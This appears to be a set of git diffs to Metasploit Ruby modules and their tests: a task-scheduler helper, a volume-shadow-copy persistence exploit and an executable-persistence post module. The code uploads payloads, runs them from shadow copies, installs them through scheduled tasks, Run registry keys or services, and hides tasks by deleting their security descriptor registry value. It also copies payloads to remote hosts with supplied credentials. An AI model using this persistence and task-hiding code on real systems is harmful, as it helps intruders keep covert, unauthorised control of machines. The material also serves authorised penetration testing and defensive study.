+            raise TaskSchedulerObfuscationError, 'Could not obtain SYSTEM privilege, which is needed to delete the key value.'
+          end
+
+          remote_host = datastore['ScheduleRemoteSystem']
+          log_and_print("[Task Scheduler] Deleting #{reg_value} in #{reg_key}#{" on remote host #{remote_host}" if remote_host.present?}")
+          if remote_host.present?
+            begin
+              run_one_off_task("reg delete \\\"#{reg_key}\\\" /v \\\"#{reg_value}\\\" /f")
+            rescue TaskSchedulerError => e
+              raise TaskSchedulerObfuscationError, "Could not delete the key value: #{e}"
+            end
+          else
+            result = cmd_exec_with_result("reg delete \"#{reg_key}\" /v \"#{reg_value}\" /f#{' /reg:64' unless @old_os}", nil, 15, { 'UseThreadToken' => true })
+            unless result[1]
+              raise TaskSchedulerObfuscationError, "Could not delete the key value. Error: #{result[0]}"
+            end
+          end
+        end
+
+        def add_reg_key_value(reg_key, reg_value, reg_data, reg_type, override: true)
+          log_and_print('[Task Scheduler] Restore the Security Descriptor registry key value to unhide the task')
+
+          unless override
+            log_and_print('[Task Scheduler] Checking if the key value exists')
+            if reg_key_value_exists?(reg_key, reg_value)
+              log_and_print("The #{reg_value} key value already exist. Set `override` to true to override the value", level: :warning)
+              return
+            end
+          end
+
+          begin
+            get_system_privs
+          rescue TaskSchedulerSystemPrivsError
+            raise TaskSchedulerObfuscationError, 'Could not obtain SYSTEM privilege, which is needed to restore the key value.'
+          end
+
+          remote_host = datastore['ScheduleRemoteSystem']
+          log_and_print("[Task Scheduler] Adding #{reg_value} in #{reg_key}#{" on remote host #{remote_host}" if remote_host.present?}")
+          if remote_host.present?
+            begin
+              run_one_off_task("reg add \\\"#{reg_key}\\\" /v \\\"#{reg_value}\\\" /t #{reg_type} /d \\\"#{reg_data}\\\" /f")
+            rescue TaskSchedulerError => e
+              raise TaskSchedulerObfuscationError, "Could not restore the key value: #{e}"
+            end
+          else
+            result = cmd_exec_with_result("reg add \"#{reg_key}\" /v \"#{reg_value}\" /t #{reg_type} /d \"#{reg_data}\" /f#{' /reg:64' unless @old_os}", nil, 15, { 'UseThreadToken' => true })
+            unless result[1]
+              raise TaskSchedulerObfuscationError, "Could not restore the key value. Error: #{result[0]}"
+            end
+          end
         end
       end
     end

--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -176,11 +176,11 @@ class MetasploitModule < Msf::Exploit::Local
     sch_name = Rex::Text.rand_text_alpha(rand(8..15))
     global_root = "\\\\?\\GLOBALROOT\\Device\\#{volume_id}\\#{exe_path}"
     task_create(sch_name, global_root, { task_type: 'MINUTE', modifier: datastore['DELAY'] })
-    if datastore['ObfuscateTask']
-      @clean_up << "reg setval -k '#{TaskSch::TASK_REG_KEY.gsub('\\') { '\\\\' }}\\#{sch_name}' "\
-                      "-v '#{TaskSch::TASK_SD_REG_VALUE}' "\
-                      "-d '#{TaskSch::DEFAULT_SD.unpack('C*').map { |v| v.ord.to_s(16).rjust(2, '0') }.join}' "\
-                      "-t 'REG_BINARY'\n"
+    if datastore['ScheduleObfuscateTask']
+      @clean_up << "reg setval -k '#{TaskSch::TASK_REG_KEY.gsub('\\') { '\\\\' }}\\\\#{sch_name}' "\
+                   "-v '#{TaskSch::TASK_SD_REG_VALUE}' "\
+                   "-d '#{TaskSch::DEFAULT_SD}' "\
+                   "-t 'REG_BINARY'#{ " -w '64'" unless @old_os}\n"
     end
     @clean_up << "execute -H -f cmd.exe -a \"/c schtasks.exe /delete /tn #{sch_name} /f\"\n"
   end

--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Local
         'License' => MSF_LICENSE,
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter'],
-        'Targets' => [ [ 'Windows 7', {} ] ],
+        'Targets' => [ [ 'Microsoft Windows', {} ] ],
         'DefaultTarget' => 0,
         'References' => [
           [ 'URL', 'https://web.archive.org/web/20201111212952/https://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/' ],
@@ -68,11 +68,6 @@ class MetasploitModule < Msf::Exploit::Local
     @clean_up = ''
 
     print_status('Checking requirements...')
-
-    os = sysinfo['OS']
-    unless os =~ /Windows 7/
-      print_warning('This module has been tested only on Windows 7')
-    end
 
     unless is_admin?
       print_error('This module requires admin privs to run')
@@ -175,13 +170,24 @@ class MetasploitModule < Msf::Exploit::Local
   def schtasks(volume_id, exe_path)
     sch_name = Rex::Text.rand_text_alpha(rand(8..15))
     global_root = "\\\\?\\GLOBALROOT\\Device\\#{volume_id}\\#{exe_path}"
-    task_create(sch_name, global_root, { task_type: 'MINUTE', modifier: datastore['DELAY'] })
-    if datastore['ScheduleObfuscationTechnique'] == 'SECURITY_DESC'
-      @clean_up << "reg setval -k '#{TaskSch::TASK_REG_KEY.gsub('\\') { '\\\\' }}\\\\#{sch_name}' "\
-                   "-v '#{TaskSch::TASK_SD_REG_VALUE}' "\
-                   "-d '#{TaskSch::DEFAULT_SD}' "\
-                   "-t 'REG_BINARY'#{" -w '64'" unless @old_os}\n"
+    begin
+      task_create(sch_name, global_root, { task_type: 'MINUTE', modifier: datastore['DELAY'] })
+    rescue TaskSchedulerObfuscationError => e
+      print_warning(e.message)
+      print_good('Task created without obfuscation')
+    rescue TaskSchedulerError => e
+      print_error("Task creation error: #{e}")
+      return
+    else
+      print_good('Task created')
+      if datastore['ScheduleObfuscationTechnique'] == 'SECURITY_DESC'
+        @clean_up << "reg setval -k '#{TaskSch::TASK_REG_KEY.gsub('\\') { '\\\\' }}\\\\#{sch_name}' "\
+                     "-v '#{TaskSch::TASK_SD_REG_VALUE}' "\
+                     "-d '#{TaskSch::DEFAULT_SD}' "\
+                     "-t 'REG_BINARY'#{" -w '64'" unless @old_os}\n"
+      end
     end
+
     @clean_up << "execute -H -f cmd.exe -a \"/c schtasks.exe /delete /tn #{sch_name} /f\"\n"
   end
 

--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -10,12 +10,13 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::ShadowCopy
   include Msf::Post::Windows::Registry
   include Msf::Exploit::EXE
+  include Msf::Post::Windows::TaskScheduler
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => "Persistent Payload in Windows Volume Shadow Copy",
+        'Name' => 'Persistent Payload in Windows Volume Shadow Copy',
         'Description' => %q{
           This module will attempt to create a persistent payload in a new volume shadow copy. This is
           based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has
@@ -39,6 +40,11 @@ class MetasploitModule < Msf::Exploit::Local
               stdapi_sys_config_sysinfo
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
+          'SideEffects' => [REPEATABLE_SESSION]
         }
       )
     )
@@ -53,66 +59,69 @@ class MetasploitModule < Msf::Exploit::Local
         OptString.new('RPATH', [ false, 'Path on remote system to place Executable. Example: \\\\Windows\\\\Temp (DO NOT USE C:\\ in your RPATH!)', ]),
       ]
     )
+
+    # All these task scheduler options are already managed by the module or are not possible (e.i. remote task scheduling)
+    deregister_options('ScheduleType', 'ScheduleModifier', 'ScheduleRemoteSystem', 'ScheduleUsername', 'SchedulePassword')
   end
 
   def exploit
-    @clean_up = ""
+    @clean_up = ''
 
-    print_status("Checking requirements...")
+    print_status('Checking requirements...')
 
     os = sysinfo['OS']
     unless os =~ /Windows 7/
-      print_warning("This module has been tested only on Windows 7")
+      print_warning('This module has been tested only on Windows 7')
     end
 
     unless is_admin?
-      print_error("This module requires admin privs to run")
+      print_error('This module requires admin privs to run')
       return
     end
 
     unless is_high_integrity?
-      print_error("This module requires UAC to be bypassed first")
+      print_error('This module requires UAC to be bypassed first')
       return
     end
 
-    print_status("Starting Volume Shadow Service...")
+    print_status('Starting Volume Shadow Service...')
     unless start_vss
-      print_error("Unable to start the Volume Shadow Service")
+      print_error('Unable to start the Volume Shadow Service')
       return
     end
 
-    print_status("Uploading payload...")
+    print_status('Uploading payload...')
     remote_file = upload(datastore['RPATH'])
 
-    print_status("Creating Shadow Volume Copy...")
+    print_status('Creating Shadow Volume Copy...')
     unless volume_shadow_copy
-      fail_with(Failure::Unknown, "Failed to create a new shadow copy")
+      fail_with(Failure::Unknown, 'Failed to create a new shadow copy')
     end
 
-    print_status("Finding the Shadow Copy Volume...")
+    print_status('Finding the Shadow Copy Volume...')
     volume_data_id = []
-    cmd = "cmd.exe /c vssadmin List Shadows| find \"Shadow Copy Volume\""
+    cmd = 'cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume"'
     output = cmd_exec(cmd)
     output.each_line do |line|
-      cmd_regex = /HarddiskVolumeShadowCopy\d{1,9}/.match("#{line}")
-      volume_data_id = "#{cmd_regex}"
+      cmd_regex = /HarddiskVolumeShadowCopy\d{1,9}/.match(line.to_s)
+      volume_data_id = cmd_regex.to_s
     end
 
-    print_status("Deleting malware...")
+    print_status('Deleting malware...')
     file_rm(remote_file)
 
-    if datastore["EXECUTE"]
+    if datastore['EXECUTE']
       print_status("Executing #{remote_file}...")
       execute(volume_data_id, remote_file)
     end
 
-    if datastore["SCHTASK"]
-      print_status("Creating Scheduled Task...")
+    if datastore['SCHTASK']
+      print_status('Creating Scheduled Task...')
       schtasks(volume_data_id, remote_file)
     end
 
-    if datastore["RUNKEY"]
-      print_status("Installing as autorun in the registry...")
+    if datastore['RUNKEY']
+      print_status('Installing as autorun in the registry...')
       install_registry(volume_data_id, remote_file)
     end
 
@@ -121,9 +130,9 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
-  def upload(trg_loc = "")
-    if trg_loc.nil? or trg_loc.empty?
-      location = "\\Windows\\Temp"
+  def upload(trg_loc = '')
+    if trg_loc.nil? || trg_loc.empty?
+      location = '\\Windows\\Temp'
     else
       location = trg_loc
     end
@@ -134,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Local
     exe = generate_payload_exe
 
     begin
-      write_file("#{file_on_target}", exe)
+      write_file(file_on_target.to_s, exe)
     rescue ::Rex::Post::Meterpreter::RequestError => e
       fail_with(Failure::NotFound, e.message)
     end
@@ -161,39 +170,46 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_exec(run_cmd)
   end
 
+  TaskSch = Msf::Post::Windows::TaskScheduler
+
   def schtasks(volume_id, exe_path)
-    sch_name = Rex::Text.rand_text_alpha(rand(8) + 8)
-    global_root = "\"\\\\?\\GLOBALROOT\\Device\\#{volume_id}\\#{exe_path}\""
-    sch_cmd = "cmd.exe /c %SYSTEMROOT%\\system32\\schtasks.exe /create /sc minute /mo #{datastore["DELAY"]} /tn \"#{sch_name}\" /tr #{global_root}"
-    cmd_exec(sch_cmd)
+    sch_name = Rex::Text.rand_text_alpha(rand(8..15))
+    global_root = "\\\\?\\GLOBALROOT\\Device\\#{volume_id}\\#{exe_path}"
+    task_create(sch_name, global_root, { task_type: 'MINUTE', modifier: datastore['DELAY'] })
+    if datastore['ObfuscateTask']
+      @clean_up << "reg setval -k '#{TaskSch::TASK_REG_KEY.gsub('\\') { '\\\\' }}\\#{sch_name}' "\
+                      "-v '#{TaskSch::TASK_SD_REG_VALUE}' "\
+                      "-d '#{TaskSch::DEFAULT_SD.unpack('C*').map { |v| v.ord.to_s(16).rjust(2, '0') }.join}' "\
+                      "-t 'REG_BINARY'\n"
+    end
     @clean_up << "execute -H -f cmd.exe -a \"/c schtasks.exe /delete /tn #{sch_name} /f\"\n"
   end
 
   def install_registry(volume_id, exe_path)
     global_root = "cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\#{volume_id}\\#{exe_path}"
-    nam = Rex::Text.rand_text_alpha(rand(8) + 8)
-    hklm_key = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
+    nam = Rex::Text.rand_text_alpha(rand(8..15))
+    hklm_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'
     print_status("Installing into autorun as #{hklm_key}\\#{nam}")
-    res = registry_setvaldata("#{hklm_key}", nam, "#{global_root}", "REG_SZ")
+    res = registry_setvaldata(hklm_key.to_s, nam, global_root.to_s, 'REG_SZ')
     if res
       print_good("Installed into autorun as #{hklm_key}\\#{nam}")
       @clean_up << "reg  deleteval -k HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v #{nam}\n"
     else
-      print_error("Error: failed to open the registry key for writing")
+      print_error('Error: failed to open the registry key for writing')
     end
   end
 
   def clean_data
-    host = session.sys.config.sysinfo["Computer"]
-    filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+    host = session.sys.config.sysinfo['Computer']
+    filenameinfo = '_' + ::Time.now.strftime('%Y%m%d.%M%S')
     logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo))
     ::FileUtils.mkdir_p(logs)
-    logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
+    logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + '.rc'
     return logfile
   end
 
   def log_file
-    clean_rc = clean_data()
+    clean_rc = clean_data
     file_local_write(clean_rc, @clean_up)
     print_status("Cleanup Meterpreter RC File: #{clean_rc}")
   end

--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -176,11 +176,11 @@ class MetasploitModule < Msf::Exploit::Local
     sch_name = Rex::Text.rand_text_alpha(rand(8..15))
     global_root = "\\\\?\\GLOBALROOT\\Device\\#{volume_id}\\#{exe_path}"
     task_create(sch_name, global_root, { task_type: 'MINUTE', modifier: datastore['DELAY'] })
-    if datastore['ScheduleObfuscateTask']
+    if datastore['ScheduleObfuscationTechnique'] == 'SECURITY_DESC'
       @clean_up << "reg setval -k '#{TaskSch::TASK_REG_KEY.gsub('\\') { '\\\\' }}\\\\#{sch_name}' "\
                    "-v '#{TaskSch::TASK_SD_REG_VALUE}' "\
                    "-d '#{TaskSch::DEFAULT_SD}' "\
-                   "-t 'REG_BINARY'#{ " -w '64'" unless @old_os}\n"
+                   "-t 'REG_BINARY'#{" -w '64'" unless @old_os}\n"
     end
     @clean_up << "execute -H -f cmd.exe -a \"/c schtasks.exe /delete /tn #{sch_name} /f\"\n"
   end

--- a/modules/post/windows/manage/persistence_exe.rb
+++ b/modules/post/windows/manage/persistence_exe.rb
@@ -255,7 +255,7 @@ class MetasploitModule < Msf::Post
       cmd << " #{datastore['SchedulePassword']}" if datastore['SchedulePassword'].present?
     end
 
-    vprint_status("Execute command: #{cmd}")
+    vprint_status("Executing command: #{cmd}")
     result = cmd_exec_with_result(cmd)
     unless result[1]
       print_error(
@@ -307,7 +307,7 @@ class MetasploitModule < Msf::Post
     task_name = datastore['StartupName'].present? ? datastore['StartupName'] : Rex::Text.rand_text_alpha(rand(8..15))
 
     print_status("Task name: '#{task_name}'")
-    if datastore['ScheduleObfuscateTask']
+    if datastore['ScheduleObfuscationTechnique'] == 'SECURITY_DESC'
       print_status('Also, removing the Security Descriptor registry key value to hide the task')
     end
     if datastore['ScheduleRemoteSystem'].present?
@@ -317,11 +317,12 @@ class MetasploitModule < Msf::Post
           'the FQDN is not used, it usually takes some time (> 1 min) due to some DNS resolution'\
           ' happening in the background'
         )
-        if datastore['ScheduleObfuscateTask']
+        if datastore['ScheduleObfuscationTechnique'] != 'SECURITY_DESC'
           print_warning(
-            'Also, since the \'ScheduleObfuscateTask\' option has been set, it will take much more time '\
-            'to be executed on the remote host for the same reasons (> 3 min). Don\'t Ctrl-C, even '\
-            'if a session pops up, be patient or use a FQDN in `ScheduleRemoteSystem` option.'
+            'Also, since the \'ScheduleObfuscationTechnique\' option is set to '\
+            'SECURITY_DESC, it will take much more time to be executed on the '\
+            'remote host for the same reasons (> 3 min). Don\'t Ctrl-C, even if '\
+            'a session pops up, be patient or use a FQDN in `ScheduleRemoteSystem` option.'
           )
         end
       end
@@ -340,7 +341,7 @@ class MetasploitModule < Msf::Post
       return
     else
       print_good('Task created')
-      if datastore['ScheduleObfuscateTask']
+      if datastore['ScheduleObfuscationTechnique'] == 'SECURITY_DESC'
         @clean_up_rc << "reg setval -k '#{TaskSch::TASK_REG_KEY.gsub('\\') { '\\\\' }}\\\\#{task_name}' "\
                         "-v '#{TaskSch::TASK_SD_REG_VALUE}' "\
                         "-d '#{TaskSch::DEFAULT_SD}' "\

--- a/modules/post/windows/manage/persistence_exe.rb
+++ b/modules/post/windows/manage/persistence_exe.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Registry
   include Msf::Post::Windows::Services
+  include Msf::Post::Windows::TaskScheduler
 
   def initialize(info = {})
     super(
@@ -38,13 +39,18 @@ class MetasploitModule < Msf::Post
               stdapi_sys_process_execute
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
+          'SideEffects' => [REPEATABLE_SESSION]
         }
       )
     )
 
     register_options(
       [
-        OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER', 'SYSTEM', 'SERVICE']]),
+        OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER', 'SYSTEM', 'SERVICE', 'TASK']]),
         OptPath.new('REXEPATH', [true, 'The remote executable to upload and execute.']),
         OptString.new('REXENAME', [true, 'The name to call exe on remote system', 'default.exe']),
         OptBool.new('RUN_NOW', [false, 'Run the installed payload immediately.', true]),
@@ -54,7 +60,13 @@ class MetasploitModule < Msf::Post
     register_advanced_options(
       [
         OptString.new('LocalExePath', [false, 'The local exe path to run. Use temp directory as default. ']),
-        OptString.new('StartupName', [false, 'The name of service or registry. Random string as default.' ]),
+        OptString.new('RemoteExePath', [
+          false,
+          'The remote path to move the payload to. Only valid when the STARTUP option is set '\
+          'to TASK and the ScheduleRemoteSystem option is set. Use the same path than LocalExePath '\
+          'if not set.'
+        ]),
+        OptString.new('StartupName', [false, 'The name of service, registry or scheduled task. Random string as default.' ]),
         OptString.new('ServiceDescription', [false, 'The description of service. Random string as default.' ])
       ]
     )
@@ -69,7 +81,7 @@ class MetasploitModule < Msf::Post
     rexe = datastore['REXEPATH']
     rexename = datastore['REXENAME']
     host, _port = session.tunnel_peer.split(':')
-    @clean_up_rc = ""
+    @clean_up_rc = ''
 
     raw = create_payload_from_file rexe
 
@@ -79,13 +91,15 @@ class MetasploitModule < Msf::Post
     # Initial execution of script
     target_exec(script_on_target) if datastore['RUN_NOW']
 
-    case datastore['STARTUP']
-    when /USER/i
-      write_to_reg("HKCU", script_on_target)
-    when /SYSTEM/i
-      write_to_reg("HKLM", script_on_target)
-    when /SERVICE/i
+    case datastore['STARTUP'].upcase
+    when 'USER'
+      write_to_reg('HKCU', script_on_target)
+    when 'SYSTEM'
+      write_to_reg('HKLM', script_on_target)
+    when 'SERVICE'
       install_as_service(script_on_target)
+    when 'TASK'
+      create_scheduler_task(script_on_target)
     end
 
     clean_rc = log_file
@@ -93,7 +107,7 @@ class MetasploitModule < Msf::Post
     print_status("Cleanup Meterpreter RC File: #{clean_rc}")
 
     report_note(host: host,
-                type: "host.persistance.cleanup",
+                type: 'host.persistance.cleanup',
                 data: {
                   local_id: session.sid,
                   stype: session.type,
@@ -110,10 +124,16 @@ class MetasploitModule < Msf::Post
   #-------------------------------------------------------------------------------
   def log_file(log_path = nil)
     # Get hostname
-    host = session.sys.config.sysinfo["Computer"]
+    if datastore['STARTUP'] == 'TASK' && @cleanup_host
+      # Use the remote hostname when remote task creation is selected
+      # Cleanup will have to be performed on this remote host
+      host = @cleanup_host
+    else
+      host = session.sys.config.sysinfo['Computer']
+    end
 
     # Create Filename info to be appended to downloaded files
-    filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+    filenameinfo = '_' + ::Time.now.strftime('%Y%m%d.%M%S')
 
     # Create a directory for the logs
     logs = if log_path
@@ -126,7 +146,7 @@ class MetasploitModule < Msf::Post
     ::FileUtils.mkdir_p(logs)
 
     # logfile name
-    logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
+    logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + '.rc'
     logfile
   end
 
@@ -143,14 +163,14 @@ class MetasploitModule < Msf::Post
   # Function to install payload in to the registry HKLM or HKCU
   #-------------------------------------------------------------------------------
   def write_to_reg(key, script_on_target)
-    nam = datastore['StartupName'] || Rex::Text.rand_text_alpha(rand(8) + 8)
+    nam = datastore['StartupName'] || Rex::Text.rand_text_alpha(rand(8..15))
     print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
     if key
-      registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", nam, script_on_target, "REG_SZ")
+      registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", nam, script_on_target, 'REG_SZ')
       print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
       @clean_up_rc << "reg deleteval -k '#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -v '#{nam}'\n"
     else
-      print_error("Error: failed to open the registry key for writing")
+      print_error('Error: failed to open the registry key for writing')
     end
   end
 
@@ -158,12 +178,12 @@ class MetasploitModule < Msf::Post
   #-------------------------------------------------------------------------------
   def install_as_service(script_on_target)
     if is_system? || is_admin?
-      print_status("Installing as service..")
-      nam = datastore['StartupName'] || Rex::Text.rand_text_alpha(rand(8) + 8)
+      print_status('Installing as service..')
+      nam = datastore['StartupName'] || Rex::Text.rand_text_alpha(rand(8..15))
       description = datastore['ServiceDescription'] || Rex::Text.rand_text_alpha(8)
       print_status("Creating service #{nam}")
 
-      key = service_create(nam, :path => "cmd /c \"#{script_on_target}\"", :display => description)
+      key = service_create(nam, path: "cmd /c \"#{script_on_target}\"", display: description)
 
       # check if service had been created
       if key != 0
@@ -172,11 +192,11 @@ class MetasploitModule < Msf::Post
       end
 
       # if service is stopped, then start it.
-      service_start(nam) if datastore['RUN_NOW'] and service_status(nam)[:state] == 1
+      service_start(nam) if datastore['RUN_NOW'] && service_status(nam)[:state] == 1
 
       @clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n"
     else
-      print_error("Insufficient privileges to create service")
+      print_error('Insufficient privileges to create service')
     end
   end
 
@@ -185,30 +205,30 @@ class MetasploitModule < Msf::Post
   def write_exe_to_target(rexe, rexename)
     # check if we have write permission
     # I made it by myself because the function filestat.writable? was not implemented yet.
-    if not datastore['LocalExePath'].nil?
+    if !datastore['LocalExePath'].nil?
 
       begin
-        temprexe = datastore['LocalExePath'] + "\\" + rexename
+        temprexe = datastore['LocalExePath'] + '\\' + rexename
         write_file_to_target(temprexe, rexe)
       rescue Rex::Post::Meterpreter::RequestError
         print_warning("Insufficient privileges to write in #{datastore['LocalExePath']}, writing to %TEMP%")
-        temprexe = session.sys.config.getenv('TEMP') + "\\" + rexename
+        temprexe = session.sys.config.getenv('TEMP') + '\\' + rexename
         write_file_to_target(temprexe, rexe)
       end
 
     # Write to %temp% directory if not set LocalExePath
     else
-      temprexe = session.sys.config.getenv('TEMP') + "\\" + rexename
+      temprexe = session.sys.config.getenv('TEMP') + '\\' + rexename
       write_file_to_target(temprexe, rexe)
     end
 
     print_good("Persistent Script written to #{temprexe}")
-    @clean_up_rc << "rm #{temprexe.gsub("\\", "\\\\\\\\")}\n"
+    @clean_up_rc << "rm #{temprexe.gsub('\\', '\\\\\\\\')}\n"
     temprexe
   end
 
   def write_file_to_target(temprexe, rexe)
-    fd = session.fs.file.new(temprexe, "wb")
+    fd = session.fs.file.new(temprexe, 'wb')
     fd.write(rexe)
     fd.close
   end
@@ -218,5 +238,103 @@ class MetasploitModule < Msf::Post
   def create_payload_from_file(exec)
     print_status("Reading Payload from file #{exec}")
     File.binread(exec)
+  end
+
+  def execute_cmd(cmd)
+    verification_token = Rex::Text.rand_text_alphanumeric(8)
+    result = cmd_exec("cmd /c #{cmd} & if not errorlevel 1 echo #{verification_token}")
+    result.include?(verification_token)
+  end
+
+  def move_to_remote(remote_host, script_on_target, remote_path)
+    print_status("Moving payload file to the remote host (#{remote_host})")
+
+    # Translate local path to remote path. Basically, change any "<drive letter>:" to "<drive letter>$"
+    remote_path = remote_path.split('\\')
+    remote_exe = remote_path.pop
+    remote_path[0].sub!(/^(?<drive>[A-Z]):/i, '\k<drive>$') unless remote_path.empty?
+    remote_path.prepend(remote_host)
+    remote_path = "\\\\#{remote_path.join('\\')}"
+
+    result = execute_cmd("net use #{remote_path} /user:#{datastore['ScheduleUsername']} #{datastore['SchedulePassword']}")
+    unless result
+      print_error("Unable to connect to the remote host: #{result}")
+      return false
+    end
+
+    # #move_file helper does not work when the target is a remote host and the session run as SYSTEM. It works with #cmd_exec.
+    result = execute_cmd("move \"#{script_on_target}\" \"#{remote_path}\\#{remote_exe}\"")
+    if result
+      print_good("Moved #{script_on_target} to #{remote_path}\\#{remote_exe}")
+    else
+      print_error('Unable to move the file to the remote host')
+    end
+
+    unless execute_cmd("net use #{remote_path} /delete")
+      print_warning('Unable to close the network connection with the remote host. This will have to be done manually')
+    end
+
+    return !!result
+  end
+
+  TaskSch = Msf::Post::Windows::TaskScheduler
+
+  def create_scheduler_task(script_on_target)
+    unless is_system? || is_admin?
+      print_error('Insufficient privileges to create a scheduler task')
+      return
+    end
+
+    remote_host = datastore['ScheduleRemoteSystem']
+    print_status("Creating a #{datastore['ScheduleType']} scheduler task#{" on #{remote_host}" unless remote_host.nil?}")
+
+    unless remote_host.nil?
+      remote_path = script_on_target
+      remote_path = "#{datastore['RemoteExePath']}\\#{datastore['REXENAME']}" if datastore['RemoteExePath']
+      return false unless move_to_remote(remote_host, script_on_target, remote_path)
+
+      @cleanup_host = remote_host
+      @clean_up_rc = "rm #{remote_path.gsub('\\', '\\\\\\\\')}\n"
+    end
+
+    task_name = datastore['StartupName'] || Rex::Text.rand_text_alpha(rand(8..15))
+    print_status(
+      "Creating task '#{task_name}'"\
+      "#{' and removing the Security Descriptor registry key value to hide the task' if datastore['ObfuscateTask']}"
+    )
+    if datastore['ScheduleRemoteSystem']
+      if Rex::Socket.dotted_ip?(datastore['ScheduleRemoteSystem'])
+        print_warning(
+          "The task will be created on the remote host #{datastore['ScheduleRemoteSystem']} and since "\
+          'the FQDN is not used, it usually takes some time (> 1 min) due to some DNS resolution'\
+          ' happening in the background'
+        )
+        if datastore['ObfuscateTask']
+          print_warning(
+            'Also, since the \'ObfuscateTask\' option has been set, it will take much more time '\
+            'to be executed on the remote host for the same reasons (> 3 min). Don\'t Ctrl-C, even '\
+            'if a session pops up, be patient or use a FQDN in `ScheduleRemoteSystem` option.'
+          )
+        end
+      end
+      @clean_up_rc = "# The 'rm' command won t probably succeed while you're interacting with the session\n"\
+                     "# You should migrate to another process to be able to remove the payload file\n"\
+                     "#{@clean_up_rc}"
+    end
+
+    begin
+      task_create(task_name, remote_host.nil? ? script_on_target : remote_path)
+    rescue TaskSchedulerError => e
+      print_error("Task creation error: #{e}")
+    end
+    print_good('Task created!')
+
+    if datastore['ObfuscateTask']
+      @clean_up_rc << "reg setval -k '#{TaskSch::TASK_REG_KEY.gsub('\\') { '\\\\' }}\\#{task_name}' "\
+                      "-v '#{TaskSch::TASK_SD_REG_VALUE}' "\
+                      "-d '#{TaskSch::DEFAULT_SD.unpack('C*').map { |v| v.ord.to_s(16).rjust(2, '0') }.join}' "\
+                      "-t 'REG_BINARY'\n"
+    end
+    @clean_up_rc << "execute -H -f schtasks -a \"/delete /tn #{task_name} /f\"\n"
   end
 end

--- a/spec/lib/msf/core/post/windows/task_scheduler_spec.rb
+++ b/spec/lib/msf/core/post/windows/task_scheduler_spec.rb
@@ -689,9 +689,16 @@ RSpec.describe Msf::Post::Windows::TaskScheduler do
         allow(subject).to receive(:reg_key_value_exists?).and_return(true)
       end
 
-      it 'does not override it' do
-        expect(subject).to_not receive(:cmd_exec_with_result)
+      it 'overrides it' do
+        expect(subject).to receive(:cmd_exec_with_result).and_return(['', true])
         subject.send(:add_reg_key_value, reg_key, reg_value, reg_data, reg_type)
+      end
+
+      context 'when the :override option is set to false' do
+        it 'does not override it' do
+          expect(subject).to_not receive(:cmd_exec_with_result)
+          subject.send(:add_reg_key_value, reg_key, reg_value, reg_data, reg_type, {override: false})
+        end
       end
 
       context 'when the :override option is set to true' do

--- a/spec/lib/msf/core/post/windows/task_scheduler_spec.rb
+++ b/spec/lib/msf/core/post/windows/task_scheduler_spec.rb
@@ -1,0 +1,749 @@
+require 'spec_helper'
+
+RSpec.describe Msf::Post::Windows::TaskScheduler do
+
+  let(:task_name) { Rex::Text.rand_text_alpha(rand(8)) }
+  let(:datastore) do
+    {
+      'ScheduleType' => 'ONSTART',
+      'ScheduleModifier' => 1,
+      'ScheduleRunAs' => 'SYSTEM',
+      'ScheduleObfuscateTask' => true
+    }
+  end
+
+  before :example do
+    allow(subject).to receive(:datastore).and_return(datastore)
+  end
+
+  def create_exploit(info = {})
+    mod = Msf::Exploit.allocate
+    mod.extend(Msf::PostMixin)
+    mod.extend described_class
+    mod.send(:initialize, info)
+    mod
+  end
+
+  subject { create_exploit }
+
+  describe '#task_create' do
+    let(:task_cmd) { 'Task Command' }
+    let(:task_type) { datastore['ScheduleType'] }
+    let(:run_as) { datastore['ScheduleRunAs'] }
+
+    before :example do
